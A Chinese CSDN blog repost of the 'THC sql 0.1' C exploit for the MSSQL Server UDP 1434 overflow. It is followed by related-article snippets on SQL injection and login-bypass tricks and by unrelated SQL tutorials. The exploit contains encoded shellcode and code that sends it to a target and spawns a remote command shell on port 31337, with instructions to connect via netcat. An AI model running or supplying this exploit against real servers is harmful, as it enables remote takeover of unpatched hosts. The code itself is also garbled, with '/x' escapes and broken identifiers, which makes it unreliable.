MSSQL OpenDataSource函数漏洞的攻击程序源码

最新推荐文章于 2024-07-25 15:08:38 发布
最新推荐文章于 2024-07-25 15:08:38 发布
阅读量740 收藏
点赞数
分类专栏: ExP 文章标签: sql struct sql server hp server socket
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/allyesno/article/details/383249
版权
针对David Litchfield发现的MSSQL OpenDataSource函数 漏洞攻击程序源码
/*****************************************************************************/
/* THC sql 0.1 - MSSQL Server exploit for Server < SP3 */
/* Exploit by: Johnny Cyberpunk (jcyberpunk@thehackerschoice.com) */
/* THC PUBLIC SOURCE MATERIALS */
/* */
/* The exploit can be freely distributed ! */
/* */
/* This is just another exploit for the well known ms sql server bug which */
/* was found by David Litchfield last summer. Details in this advisory: */
/* http://www.nextgenss.com/advisories/ms sql-udp.txt */
/* */
/* This exploit was tested on an english Windows 2k Server SP2 and MSSQL */
/* Server with SP0 and SP2 and has worked properly. The used shellcode is */
/* completely offsetless, which makes this exploit quite stable */
/* */
/* After successful exploitation of this bug, a commandshell should spawn on */
/* TCP port 31337 ! Use netcat to connect to this port ! */
/* */
/* If there's no connectable port 31337, maybe it's blocked by a firewall ! */
/* */
/* compile with MS Visual C++ : cl THC sql.c /link ws2 _32.lib */
/* */
/* At least some greetz fly to : THC, Halvar Flake, FX, gera, MaXX, dvorak, */
/* scut, stealth, zip, zilvio and the rest of the combo ...... */
/*****************************************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>

char badbuffer[] =
"/x04"
"THCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHC"
"THCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHC"
"/xdc/xc9/xb0/x42"
"/xeb/x0e"
"JC"
"THC!"
"/x01/x70/xae/x42"
"/x01/x70/xae/x42"
"/x8b/xfc/x83/xc7/x2c/x66/x81/xec/x04/x02/x33/xc9/xb2/x35/x66"
"/x81/xc1/x38/x01/x8a/x1f/x32/xda/x88/x1f/x47/xe2/xf7/xde/x16"
"/x4f/x5c/x37/x30/x59/x6c/xcd/x28/xa9/xeb/xb9/xe4/x79/x45/xe1"
"/x36/xc5/x12/x15/x15/x05/x3d/x62/x66/x07/x6a/x06/x07/x1b/x71"
"/x79/x79/x34/xde/x30/xdd/xcc/xca/xca/xca/x68/xb6/xd8/x1f/x5f"
"/x05/x6c/x51/xbe/x34/xbe/x75/x39/xbe/x45/x29/x98/xbe/x4d/x3d"
"/xb8/x6a/x09/xbe/x2e/x34/xce/xbe/x6e/x4d/x34/xce/xbe/x7e/x29"
"/x34/xcc/xbe/x66/x11/x34/xcf/x66/x64/x67/xbe/x6e/x15/x34/xce"
"/x04/xfc/x74/x04/xf5/xac/xbe/x01/xbe/x34/xcb/x99/x04/xf7/xe4"
"/xd7/xb1/xf5/x40/xc2/x3a/x83/x70/x30/xb8/x71/x70/x31/x53/x0c"
"/x25/x40/xd4/x53/x04/x25/x6f/x6d/x6b/x63/x65/x67/x1e/x7b/x25"
"/x74/x3a/x82/x39/x7f/xbe/x31/xbd/x34/xcd/x3a/x83/x78/x30/xbc"
"/x71/xb8/xed/xcb/x78/x30/x40/x8b/xcb/x78/x31/x41/x14/xcb/x78"
"/x17/xb8/x68/x2d/x66/xca/xe5/xbc/xf2/x5f/x31/x6d/xbd/x70/x30"
"/xb5/x70/x42/x3f/xb8/x68/x41/xb5/x5e/x13/x21/xdc/x4d/xca/xca"
"/xca/xbc/xfb/x04/xee/x66/x66/x66/x66/x63/x73/x63/xca/xe5/xa2"
"/x60/x6d/x53/xbc/x05/x5f/x25/x60/x62/xca/x60/xe1/x7b/x63/x62"
"/xca/x60/xf9/x66/x60/x62/xca/x60/xe5/xa2/xb8/x70/xbd/x65/xca"
"/x60/xd1/x60/x60/xca/x60/xdd/xb8/x71/x30/x39/xa1/x66/x5d/x1b"
"/x50/x4d/x50/x5d/x69/x56/x58/x51/xa1/x04/xe7/xb8/x70/xf9/xa1"
"/x62/x62/x62/x66/x66/xcb/xf3/x34/xc7/x67/xa1/xb8/x70/x4d/x65"
"/xb8/x70/xbd/x65/x84/x3d/x66/x66/x5f/x25/xcb/xfb/x67/x66/x66"
"/x66/x60/xca/x60/xd9/x5f/xca/xca/x60/xd5";

void usage();

int main(int argc, char *argv[])
{
unsigned short sqlport=1434;
unsigned int sock,addr,rc;
struct sockaddr _in sqludp;
struct hostent * hp;
WSADATA wsaData;

printf("/nTHC sql v0.1 - Wind0wZ remote root sploit for MSSQL-Servers < SP3/n");
printf("by Johnny Cyberpunk (jcyberpunk@thehackerschoice.com)/n");
printf("bug was found by David Litchfield/n");

if(argc<2)
 usage();
 
 if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0)
{
 printf("WSAStartup failed !/n");
 exit(-1);
}

hp = gethostbyname(argv[1]);

if (!hp){
 addr = inet _addr(argv[1]);
}
if ((!hp) && (addr == INADDR _NONE) )
{
 printf("Unable to resolve %s/n",argv[1]);
 exit(-1);
}

sock=socket(AF _INET,SOCK _DGRAM,IPPROTO _UDP);
if (!sock)
{
 printf("socket() error.../n");
 exit(-1);
}

if (hp != NULL)
 memcpy(&( sqludp.sin _addr),hp->h _addr,hp->h _length);
else
  sqludp.sin _addr.s _addr = addr;

if (hp)
  sqludp.sin _family = hp->h _addrtype;
else
  sqludp.sin _family = AF _INET;

sqludp.sin _port=htons( sqlport);

rc=connect(sock, (struct sockaddr *) & sqludp, sizeof (struct sockaddr _in));
if(rc==0)
{
 send(sock,badbuffer,sizeof(badbuffer)-1,0);
 printf("/nexploit send .... sleeping a while ..../n");
 Sleep(1000);
 printf("/nok ... now try to connect to port 31337 via netcat !/n");
}
else
 printf("can't connect to sql port udp 1434!/n");

shutdown(sock,1);
closesocket(sock);
exit(0);
}

void usage()
{
unsigned int a;
printf("/nUsage: <Host>/n");
exit(0);
}
 
allyesno
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
渗透测试之突破口——web服务突破
m0_61506558的博客
10-17 523
任意用户注册可爆破用户名爆破用户名,密码用户名注入万能密码用户名Xss修改返回包信息,登入他人账户修改cookie中的参数,如user,adminid等HTML源码、JS等查看信息搜集一章后台登录参数修改为注册参数/reg、/register、/sign等密码重置1.重置一个账户,不发送验证码,设置验证码为空发送请求。2.发送验证码,查看相应包3.验证码生存期的爆破4.修改相应包为成功的相应包5.手工直接跳转到校验成功的界面。
sql注入的攻击与利用
MSB_WLAQ的博客
10-11 577
前言 本文叙述了在Mysql、MSsql、Oracle、PostgreSQL平台下的sql注入探测方式与利用,作为个人笔记,没有框架以及中间件的参与。 文章的内容并不全面,日后有接触新的方法会有补充。 探测方法 首先贴出增删改查的基本语句,加粗部分为用户可控: mysql: select item from table where valuelike db_value; select item1,item2 from table where '**value1'**like db_value
SQL注入详解
热门推荐
qq_48904485的博客
03-21 2万+
针对SQL注入的攻击行为可描述为通过用户可控参数中注入SQL语法,破坏原有SQL结构,达到编写程序意料之外结果的攻击行为。 其成因可归结为以下两个原理叠加造成: 1、程序编写者在处理程序和数据库交互时,使用字符串凭借的方式构造SQL语句。 2、未对用户可控参数进行足够的过滤便将参数内容拼接进入到SQL语句中。 SQL注入的攻击方式分为:报错注入、布尔盲注 、延时注入、堆叠查询、联合查询 、二次注入等等
掌控安全Web安全微专业笔记
xcsxchen
10-26 1万+
1-3 Web通信原理 一、基本知识介绍 IP 正统定义:互联网协议地址,缩写为IP地址,是分配给用户上网使用的网际协议的设备的数字标签。 老师理解:ip实际上就是地址,如果我想到你家去玩,那么我肯定要知道你家住在哪里,ip实际上就是你电脑的地址,在网络上可以通过ip来访问你的计算机。 ip有内网和公网的概念。什么是内网?什么是公网? 打个比方: 你家的门牌号那就是个公网地址,X省X市X街道X号,别人看到这个地址就能找到你家 内网地址是什么妮,假设你住的是一个大楼,比如住401房间,那么只有同一个大楼里面的
Web安全之SQL注入总结
xlsj雪松的博客
01-16 604
本文会介绍POST注入、Head注入、报错注入、盲注、cookie注入、宽字节注入、堆叠注入、偏移注入、DNS注入、Access、Mssql、Oracle注入原理和手法。 联合注入:https://blog.csdn.net/xlsj228/article/details/105841168 按变量类型分:数字型和字符型 按HTTP提交方式分:POST注入、GET注入和Cookie注入 按注入方式分:布尔注入、联合注入、堆叠注入、报错注入、时间盲注 按数据库类型分: sql:o
基于OPENDATASOURCE函数的SQL Server数据库海量数据的快速导入导出方法
01-10
为了高效地管理大量数据,SQL Server提供了一种灵活的工具——OPENDATASOURCE函数,它允许我们直接从外部源读取数据,从而实现快速的数据导入导出。下面我们将详细探讨基于OPENDATASOURCE函数的这种方法。 ...
Opendatasource注入工具+VB源代码.rar
01-16
当应用程序使用`OpenDataSource`函数直接将用户输入的数据拼接到SQL查询中,而不进行充分的验证和转义,攻击者可能插入恶意SQL语句,获取、修改或删除数据库中的敏感信息。 2. **VB(Visual Basic)编程**:VB是一...
SQL函数说明大全
06-10
行集函数如`OPENQUERY`和`OPENDATASOURCE`用于连接外部数据源,返回行集,适用于集成不同数据库系统。 #### 安全函数:管理权限和角色 安全函数如`SUSER_SNAME`和`IS_MEMBER`用于验证用户身份和角色,确保数据访问...
sqlserver函数大全.pdf
10-08
SQL Server函数是数据库管理系统中用于处理和操作数据的重要工具,它们可以帮助我们执行各种任务,从简单的数据转换到复杂的计算和分析。以下是对SQL Server函数的详细分类和介绍: 1. **聚合函数**: - `COUNT`:...
最新Excel函数应用集3 0
07-31
在Excel中,SQL函数如OPENROWSET或OPENDATASOURCE可用于直接查询数据库,将结果返回到工作表中。掌握SQL语言,理解SQL查询语句的编写,能帮助用户高效地从数据库中提取数据,进行进一步的分析。 源码部分提供了实际...
解开基于大模型的Text2SQL的神秘面纱
shengjk1的博客
07-25 805
本文介绍了NL2SQL的实现方式,包括目前比较火的开源项目Vanna、DAIL-SQL以及其他实现方式,同时总结了当前NL2SQL实现方式的优化点。此外,本文还介绍了Text-to-SQL测试集WikiSQL、Spider和BIRD,以及评估模型性能的指标Spider Exact Match和Spider Exact Execution。
数据库 执行sql添加删除字段
m0_60873265的博客
07-25 284
ALTER TABLE 表明 ADD COLUMN 字段名 类型 DEFAULT NULL COMMENT 注释 AFTER 哪个字段后面;ALTER TABLE 表明 DROP COLUMN 字段;
会Excel就会sql?
svygh123的专栏
07-20 1531
以上就是通过具体的例子来说明Excel中对应的操作,以便更好地对比SQL,通过这些步骤,你可以直观地在Excel中实现类似数据库操作的功能,SQL就像是数据库世界的Excel,但它更加强大,适用于大规模数据处理和复杂的数据关系管理。虽然开始时可能会觉得SQL语法有些抽象,但一旦掌握了基础,你会发现它非常高效且强大,特别是在处理大量数据和执行复杂查询时。就像在Excel中一样,实践中学习SQL会更加有效,尝试编写一些简单的查询,逐渐增加难度,你会很快上手的!
Qt基础 | QSqlTableModel 的使用
zwcslj的博客
07-24 934
QSqlTableModel 直接设置一个数据表的名称,可以获取数据表的全部记录 ,其结果是可编辑的,设置为界面上的 QTableView 组件的数据模型后就可以显示和编辑数据。
sql的执行流程
qq_59395271的博客
07-24 1054
执行过程分成两层,一层是server层,主要进行连接服务,和分析语句,执行sql具体流程是 首先与用户通过连接器建立连接,然后将sql查询语句在查询缓存中查找,如果查找处理过相同的语句将,直接返回数据,给连接器,进而返回给用户,如果没有查到,则将sql语句发送给解析器,解析器中有词法分析和语法分析,通过这两个分析过程,创建对应的sql语法树,然后执行sql查询语句流程,首先经过预处理,优化器,执行计划,最后通过执行器,建立和存储引擎的连接。
SQL Server 数据误删的恢复
踏雨歌青春,诗酒趁年华
07-24 9707
在日常的数据库管理中,数据的误删操作是难以避免的。为了确保数据的安全性和完整性,我们必须采取一些措施来进行数据的备份和恢复。本文将详细介绍如何在 SQL Server 中进行数据的备份和恢复操作,特别是在发生数据误删的情况下。假设我们已经开启了全量备份,并且在误操作之前有一个全量备份文件。
PostgreSQL的pg-collector工具
lee_vincent1的博客
07-25 564
pg-collector 是一个用于 PostgreSQL 数据库的监控和数据收集工具。它主要用于收集 PostgreSQL 实例的性能指标、查询统计和日志信息,以便进行数据库性能分析和故障排查。通过收集这些数据,管理员可以更好地了解数据库的运行状况,优化查询性能,并及时发现潜在的问题。通过以上步骤,我们能够在PostgreSQL中成功安装并运行pg-collector工具,以收集和分析数据库的性能指标和统计信息。
大模型实战—Text2SQL
07-25 1万+
无论是否使用LLM,执行模型生成的SQL查询时仍应格外小心。一些降低风险的方法包括描述你的数据库模式、数据;限制输出的大小;在执行之前验证和审查生成的SQL查询。
chromedriver-mac-arm64_126.0.6474.0.zip
最新发布
07-31
chromedriver-mac-arm64_126.0.6474.0.zip
mybatis怎么用OPENDATASOURCE
06-03
MyBatis是一个优秀的Java持久化框架,它并不支持直接使用OPENDATASOURCE。不过,你可以通过配置MyBatis的数据源来使用OPENDATASOURCE。 具体步骤如下: 1. 在MyBatis的配置文件中,配置数据源,比如使用JNDI数据源...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值